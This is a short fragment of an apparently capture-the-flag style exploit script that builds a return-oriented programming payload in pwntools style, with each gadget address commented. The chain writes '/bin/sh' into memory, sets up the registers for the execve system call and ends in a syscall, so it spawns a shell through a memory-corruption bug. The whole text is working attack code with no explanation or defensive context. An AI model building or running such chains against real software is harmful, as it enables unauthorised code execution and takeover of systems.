payload = p64(0x409c10)
#0x0000000000409c10: pop rsi; ret; 
payload += p64(0x43b043)+p64(0x40dcde)
# 0x000000000040dcde: lea eax, [rsi + 0x2c]; ret; 
payload += p64(0x427db4)
# 0x0000000000427db4: lea edx, [rax + 1]; mov eax, r8d; imul rax, rdx; ret; 
payload += p64(0x409c10)
# 0x0000000000409c10: pop rsi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x40dd1f)
# 0x000000000040dd1f: mov qword ptr [rdx], rsi; ret; 
payload += p64(0x408bdb)
# 0x0000000000408bdb: xor edx, edx; mov rax, rdx; ret; 
payload += p64(0x40ed50)
# 0x000000000040ed50: mov eax, dword ptr [rsp + 8]; add rsp, 0x10; pop rbx; ret; 
payload += p64(0x0)+p64(0x43b070)+p64(0x0)+p64(0x41bc1b)
# 0x000000000041bc1b: xchg eax, edi; pop rbx; pop rbp; pop r12; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x0)+p64(0x409c10)
# 0x0000000000409c10: pop rsi; ret; 
payload += p64(0xf)+p64(0x40dcde)
# 0x000000000040dcde: lea eax, [rsi + 0x2c]; ret; 
payload += p64(0x409c10)
# 0x0000000000409c10: pop rsi; ret; 
payload += p64(0x0)+p64(0x40c522)
# 0x000000000040c522: syscall; 
payload += b''
